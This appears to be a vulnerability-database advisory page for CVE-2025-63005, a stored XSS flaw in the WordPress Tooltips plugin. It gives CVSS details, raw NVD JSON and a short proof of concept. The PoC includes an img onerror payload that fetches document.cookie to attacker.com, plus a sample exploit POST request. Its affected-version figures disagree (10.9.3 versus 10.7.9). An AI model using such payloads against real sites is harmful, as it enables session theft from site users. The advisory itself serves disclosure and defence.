Security Vulnerability Report
中文
CVE-2025-63005 CVSS 6.5 MEDIUM

CVE-2025-63005

Published: 2025-12-31 09:15:53
Last Modified: 2026-04-23 15:34:57

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tomas WordPress Tooltips wordpress-tooltips allows Stored XSS.This issue affects WordPress Tooltips: from n/a through <= 10.9.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Tooltips (wordpress-tooltips) <= 10.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-63005 WordPress Tooltips Stored XSS PoC // Author: [email protected] // Payload: <script>alert(document.cookie)</script> // or // Payload: <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> // Steps to exploit: // 1. Login to WordPress with low-privilege account (subscriber/contributor) // 2. Navigate to Tooltips settings or create new tooltip // 3. Insert XSS payload in tooltip content field // 4. Save the tooltip // 5. When admin or other users view pages with this tooltip, XSS will execute // Example HTTP POST request: /* POST /wp-admin/admin.php?page=wordpress-tooltips HTTP/1.1 Host: target.com Cookie: [authenticated cookie] Content-Type: application/x-www-form-urlencoded tooltip_content=<script>alert(document.cookie)</script>&action=save_tooltip */ // Detection: Check for unescaped HTML in tooltip storage and output // The plugin should use htmlspecialchars() or wp_kses() before storing/outputting data

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63005", "sourceIdentifier": "[email protected]", "published": "2025-12-31T09:15:52.570", "lastModified": "2026-04-23T15:34:56.520", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tomas WordPress Tooltips wordpress-tooltips allows Stored XSS.This issue affects WordPress Tooltips: from n/a through <= 10.9.3."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Tomas WordPress Tooltips permite XSS Almacenado. Este problema afecta a WordPress Tooltips: desde n/a hasta 10.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wordpress-tooltips/vulnerability/wordpress-wordpress-tooltips-plugin-10-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}